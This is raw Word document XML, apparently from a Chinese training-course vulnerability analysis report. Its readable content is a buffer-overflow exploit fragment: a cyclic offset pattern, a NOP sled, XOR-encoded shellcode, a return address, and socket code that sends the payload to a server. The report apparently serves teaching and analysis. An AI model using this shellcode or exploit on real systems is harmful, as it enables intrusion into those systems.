        <w:t>Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3C"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5A3C66CA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"\xf7\xf8\x6a\x75"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5A404832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"\x90\x90\x90\x90\x90\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"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6F1E86D2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"\x33\xC0"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01270C45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"\xE8\xFF\xFF\xFF\xFF"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520E6EC9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"\xC3"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0EBCE5F2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"\x58"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7FCE3A72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"\x8D\x70\x1B"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25A516D6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"\x33\xC9"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4969C71D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"\x66\xB9\x06\x03"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7A08864A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"\x8A\x04\x0E"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3414AE28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"\x34\x07"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186A1651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"\x88\x04\x0E"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38E6D67A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"\xE2\xF6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0ABED0E1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"\x80\x34\x0E\x07"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555FF0F3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"\xFF\xE6"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5CAB705E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"\x84\xEB\x27\xEC\x4A\x4F\x62\x6B\x6B\x68\x27\x69\x54\x6C\x7E\x26"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3802BB0A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"\x07\x42\x7F\x6E\x73\x57\x75\x68\x64\x62\x74\x74\x07\x4A\x62\x74"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5BCE2FE5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"\x74\x66\x60\x62\x45\x68\x7F\x46\x07\x72\x74\x62\x75\x34\x35\x29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1010460D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"\x63\x6B\x6B\x07\x4B\x68\x66\x63\x4B\x6E\x65\x75\x66\x75\x7E\x42"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5B5C1CBD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"\x7F\x46\x07\x40\x62\x73\x57\x75\x68\x64\x46\x63\x63\x75\x62\x74"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77C76B74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"\x74\x07\xEF\x07\x07\x07\x07\x5C\x63\x8C\x32\x37\x07\x07\x07\x8C"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38723774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"\x71\x0B\x8C\x71\x1B\x8C\x31\x8C\x51\x0F\x54\x55\xEF\x13\x07\x07"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10C62FCA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"\x07\x8C\xF7\x55\x8A\x4C\xDA\x56\x55\xF8\xD7\x5D\x54\x51\x57\x55"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1E241946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"\xEF\x69\x07\x07\x07\x52\x8C\xEB\x84\xE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>B\x0B\x55\x8C\x52\x0F\x8C"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69EA5171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"\x75\x3B\x8A\x33\x35\x8C\x71\x7F\x8A\x33\x35\x8C\x79\x1B\x8A\x3B"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5D435309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"\x3D\x8E\x7A\xFB\x8C\x79\x27\x8A\x3B\x3D\x8E\x7A\xFF\x8C\x79\x23"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7AD56B30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"\x8A\x3B\x3D\x8E\x7A\xF3\x34\xC7\xEC\x06\x47\x8C\x72\xFF\x8C\x33"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687E185B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"\x81\x8C\x52\x0F\x8A\x33\x35\x8C\x5A\x0B\x8A\x7C\xEB\xBE\x09\x07"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48794814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"\x07\x07\xFB\xF4\xA1\x72\xE4\x8C\x72\xF3\x34\xF8\x61\x8C\x3B\x41"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6FCF0C1E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"\x8C\x52\xFB\x8C\x33\xBD\x8C\x52\x0F\x8A\x03\x35\x5D\x8C\xE2\x5A"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7510C777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"\xC5\x0F\x07\x52\x8C\xEB\x84\xEB\x0F\x8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>C\x5A\x13\x8A\x4C\xD5\x6D"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1FC12814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"\x07\x6D\x07\x56\xF8\x52\x0B\x8A\x4C\xC1\x56\x57\xF8\x52\x17\x8E"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502B46E1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"\x42\xFB\x8A\x4C\xBD\x56\xF8\x72\x0F\xF8\x52\x17\x8E\x42\xFF\x8A"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274B07BF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"\x4C\xA9\x6D\x07\x56\x56\x6D\x07\xF8\x52\xFB\x6D\x07\xF8\x52\xFF"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0474F458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A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"\x07"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8000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>// 0x756af8f7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE922A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send(sclient, sendData, strlen(sendData), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9FF98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recv(sclient, recData, 4096, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F35BF" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9DBDD2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8000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/*------------------- 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>、关闭套接字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> -------------------*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11880E8A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closesocket(sclient);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA27151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WSACleanup();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1F836" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4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24FBE38B" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:jc w:val="left"/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E55209D" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4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参考资料</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="52D10E10" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15pb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任老师课上演示</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0033502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98523" w14:textId="77777777" w:rsidR="000608A4" w:rsidRDefault="000608A4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4103D9BB" w14:textId="77777777" w:rsidR="000608A4" w:rsidRDefault="00060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5FED1" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="758DA6F6" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502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0994654"/>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1728636285"/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:p w14:paraId="1B692215" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A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B4D4E28" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4153"/>
        <w:tab w:val="clear" w:pos="8306"/>
        <w:tab w:val="left" w:pos="7187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A9906" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="003350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84853" w14:textId="77777777" w:rsidR="000608A4" w:rsidRDefault="000608A4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7548196B" w14:textId="77777777" w:rsidR="000608A4" w:rsidRDefault="000608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AED57" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
    <w:pPr>
      <w:pStyle w:val="a7"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="98381352"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76F1DD10" wp14:editId="37BA94CA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</w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent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BEAEB78" wp14:editId="4E580527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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>病毒分析报告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</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>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 w14:anchorId="21CA89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5907285" o:spid="_x0000_s3075" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:450.1pt;height:533.6pt;z-index:-251654144;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId2" o:title="15pb 副本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3728" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
    <w:pPr>
      <w:pStyle w:val="a7"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1026062982"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="720DAA04" wp14:editId="114049D3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</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>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</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>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 w14:paraId="22F2B986" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
    <w:pPr>
      <w:pStyle w:val="a7"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="6A5CEC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5907286" o:spid="_x0000_s3074" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:450.1pt;height:533.6pt;z-index:-251653120;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId2" o:title="15pb 副本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CEE99" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
    <w:pPr>
      <w:pStyle w:val="a7"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09EBF9AD" wp14:editId="3CD61F84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 w14:anchorId="7D83D1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5907284" o:spid="_x0000_s3073" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:450.1pt;height:533.6pt;z-index:-251655168;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;mso-width-relative:page;mso-height-relative:page" o:allowincell="f">
          <v:imagedata r:id="rId2" o:title="15pb 副本" gain="19661f" blacklevel="22938f"/>
          <w10:wrap anchorx="margin" anchory="margin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</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>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rFonts w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>漏洞</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>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</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>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www.15pb.com.cn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1908"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C501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20"/>
  <w:evenAndOddHeaders/>
  <w:drawingGridVerticalSpacing w:val="156"/>
  <w:noPunctuationKerning/>
  <w:characterSpacingControl w:val="compressPunctuation"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="3076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4AB"/>
    <w:rsid w:val="0005599E"/>
    <w:rsid w:val="00055ACD"/>
    <w:rsid w:val="00055D4E"/>
    <w:rsid w:val="00056506"/>
    <w:rsid w:val="00056A5C"/>
    <w:rsid w:val="00056D0D"/>
    <w:rsid w:val="00057A5F"/>
    <w:rsid w:val="000606B1"/>
    <w:rsid w:val="000608A4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3F5B"/>
    <w:rsid w:val="00074855"/>
    <w:rsid w:val="000749E8"/>
    <w:rsid w:val="000757E9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5C9"/>
    <w:rsid w:val="0009578A"/>
    <w:rsid w:val="00095CF7"/>
    <w:rsid w:val="000961BF"/>
    <w:rsid w:val="00096450"/>
    <w:rsid w:val="000964A4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739C"/>
    <w:rsid w:val="000A73F7"/>
    <w:rsid w:val="000A75BC"/>
    <w:rsid w:val="000A7B33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2E89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5B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13F"/>
    <w:rsid w:val="00167AFB"/>
    <w:rsid w:val="00171131"/>
    <w:rsid w:val="00171639"/>
    <w:rsid w:val="001726DC"/>
    <w:rsid w:val="00172A27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7324"/>
    <w:rsid w:val="001E760D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092E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89B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8E0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1D4F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586"/>
    <w:rsid w:val="002F486E"/>
    <w:rsid w:val="002F57A9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07EC8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02E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0C58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4D6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ED5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4C"/>
    <w:rsid w:val="00427FB2"/>
    <w:rsid w:val="004312E5"/>
    <w:rsid w:val="004316B2"/>
    <w:rsid w:val="0043191E"/>
    <w:rsid w:val="00431BAD"/>
    <w:rsid w:val="00431FFC"/>
    <w:rsid w:val="004325E8"/>
    <w:rsid w:val="0043287B"/>
    <w:rsid w:val="00432885"/>
    <w:rsid w:val="004334B8"/>
    <w:rsid w:val="00433B89"/>
    <w:rsid w:val="0043454B"/>
    <w:rsid w:val="00434ACE"/>
    <w:rsid w:val="00435318"/>
    <w:rsid w:val="00435525"/>
    <w:rsid w:val="00435AF6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1D1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CC3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B2"/>
    <w:rsid w:val="004C5C1F"/>
    <w:rsid w:val="004C6D15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44D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45F4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304"/>
    <w:rsid w:val="00612615"/>
    <w:rsid w:val="00612A44"/>
    <w:rsid w:val="00612AFD"/>
    <w:rsid w:val="006136D8"/>
    <w:rsid w:val="00614FD2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4DDD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08B6"/>
    <w:rsid w:val="00651209"/>
    <w:rsid w:val="006514A0"/>
    <w:rsid w:val="00651C48"/>
    <w:rsid w:val="00651E0C"/>
    <w:rsid w:val="00652081"/>
    <w:rsid w:val="006525A1"/>
    <w:rsid w:val="00652D5B"/>
    <w:rsid w:val="00653100"/>
    <w:rsid w:val="0065337E"/>
    <w:rsid w:val="00653B36"/>
    <w:rsid w:val="0065408D"/>
    <w:rsid w:val="006552F8"/>
    <w:rsid w:val="006556E1"/>
    <w:rsid w:val="00655715"/>
    <w:rsid w:val="00655763"/>
    <w:rsid w:val="006557C1"/>
    <w:rsid w:val="00655971"/>
    <w:rsid w:val="00655AEF"/>
    <w:rsid w:val="0065632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7D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027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5059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3B6D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07FA"/>
    <w:rsid w:val="006F1730"/>
    <w:rsid w:val="006F1ABA"/>
    <w:rsid w:val="006F2155"/>
    <w:rsid w:val="006F252A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6F798B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AB1"/>
    <w:rsid w:val="00713D7C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1E47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9D3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AD"/>
    <w:rsid w:val="007846F2"/>
    <w:rsid w:val="007849CB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04C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79B"/>
    <w:rsid w:val="007B5BC0"/>
    <w:rsid w:val="007B60FC"/>
    <w:rsid w:val="007B61C8"/>
    <w:rsid w:val="007B6DE9"/>
    <w:rsid w:val="007B769B"/>
    <w:rsid w:val="007B7815"/>
    <w:rsid w:val="007C09C8"/>
    <w:rsid w:val="007C0FF4"/>
    <w:rsid w:val="007C157D"/>
    <w:rsid w:val="007C15AC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A7A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BA3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1790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97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892"/>
    <w:rsid w:val="00884A45"/>
    <w:rsid w:val="00884ABF"/>
    <w:rsid w:val="00884C8D"/>
    <w:rsid w:val="00884D7E"/>
    <w:rsid w:val="00884F46"/>
    <w:rsid w:val="008854E4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D8D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49EB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3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6F61"/>
    <w:rsid w:val="00967045"/>
    <w:rsid w:val="00967387"/>
    <w:rsid w:val="009679B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1A9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7AD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27CE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17"/>
    <w:rsid w:val="00AF60B2"/>
    <w:rsid w:val="00AF6542"/>
    <w:rsid w:val="00AF66C7"/>
    <w:rsid w:val="00AF6BD9"/>
    <w:rsid w:val="00AF72AB"/>
    <w:rsid w:val="00AF7364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1CE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357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630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9D2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C49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2E56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BD6"/>
    <w:rsid w:val="00C42D41"/>
    <w:rsid w:val="00C42E4F"/>
    <w:rsid w:val="00C43804"/>
    <w:rsid w:val="00C43A0D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1E2"/>
    <w:rsid w:val="00C602DD"/>
    <w:rsid w:val="00C60A37"/>
    <w:rsid w:val="00C60C69"/>
    <w:rsid w:val="00C60FA3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906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931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0371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5F4"/>
    <w:rsid w:val="00CB372D"/>
    <w:rsid w:val="00CB3758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506"/>
    <w:rsid w:val="00CC5F92"/>
    <w:rsid w:val="00CC64FB"/>
    <w:rsid w:val="00CC6DE6"/>
    <w:rsid w:val="00CC76FB"/>
    <w:rsid w:val="00CC779D"/>
    <w:rsid w:val="00CC791E"/>
    <w:rsid w:val="00CC7A07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720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4DC6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44E1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6FF"/>
    <w:rsid w:val="00D83825"/>
    <w:rsid w:val="00D83A94"/>
    <w:rsid w:val="00D83E42"/>
    <w:rsid w:val="00D84AB4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95B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6F85"/>
    <w:rsid w:val="00DA7C85"/>
    <w:rsid w:val="00DA7E3A"/>
    <w:rsid w:val="00DB0ACE"/>
    <w:rsid w:val="00DB0EC3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6B64"/>
    <w:rsid w:val="00DB6BB1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4E0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049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6059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066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0B8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6A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610E"/>
    <w:rsid w:val="00E96532"/>
    <w:rsid w:val="00E967B2"/>
    <w:rsid w:val="00E9703F"/>
    <w:rsid w:val="00E975B2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855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3DD9"/>
    <w:rsid w:val="00EC4390"/>
    <w:rsid w:val="00EC446C"/>
    <w:rsid w:val="00EC4BC7"/>
    <w:rsid w:val="00EC72C0"/>
    <w:rsid w:val="00EC7345"/>
    <w:rsid w:val="00EC7A73"/>
    <w:rsid w:val="00ED09F4"/>
    <w:rsid w:val="00ED191A"/>
    <w:rsid w:val="00ED1B2A"/>
    <w:rsid w:val="00ED31CE"/>
    <w:rsid w:val="00ED3542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02F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C2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2B8D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A94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4D"/>
    <w:rsid w:val="00F90266"/>
    <w:rsid w:val="00F90CC9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1CF"/>
    <w:rsid w:val="00FD6E3C"/>
    <w:rsid w:val="00FD6FE3"/>
    <w:rsid w:val="00FD70B1"/>
    <w:rsid w:val="00FD7239"/>
    <w:rsid w:val="00FD784D"/>
    <w:rsid w:val="00FE00C4"/>
    <w:rsid w:val="00FE1212"/>
    <w:rsid w:val="00FE214A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BD1"/>
    <w:rsid w:val="00FF6F29"/>
    <w:rsid w:val="00FF716B"/>
    <w:rsid w:val="00FF7534"/>
    <w:rsid w:val="00FF7EE5"/>
    <w:rsid w:val="0A4A597F"/>
    <w:rsid w:val="1E2115B9"/>
    <w:rsid w:val="26815AC0"/>
    <w:rsid w:val="28371024"/>
    <w:rsid w:val="34AE52F4"/>
    <w:rsid w:val="355C01C3"/>
    <w:rsid w:val="53470338"/>
    <w:rsid w:val="59C822F0"/>
    <w:rsid w:val="72142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6"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="7EF819DE"/>
  <w15:docId w15:val="{19FD07FA-2247-4315-81E8-E5BF12563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/>
    <w:lsdException w:name="toc 8" w:uiPriority="39" w:unhideWhenUsed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宋体" w:hAnsi="宋体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  <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi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</w:rPr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paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:leftChars="1400" w:left="2940"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi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  <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi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8">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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宋体" w:eastAsia="宋体" w:hAnsi="宋体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 w:hAnsi="宋体" w:cs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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/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eader-value">
    <w:name w:val="header-value"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="4-11">
    <w:name w:val="网格表 4 - 着色 11"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="49"/>
    <w:qFormat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k">
    <w:name w:val="k"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kt">
    <w:name w:val="kt"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nc">
    <w:name w:val="nc"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c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  <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s">
    <w:name w:val="s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subst">
    <w:name w:val="hljs-subst"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
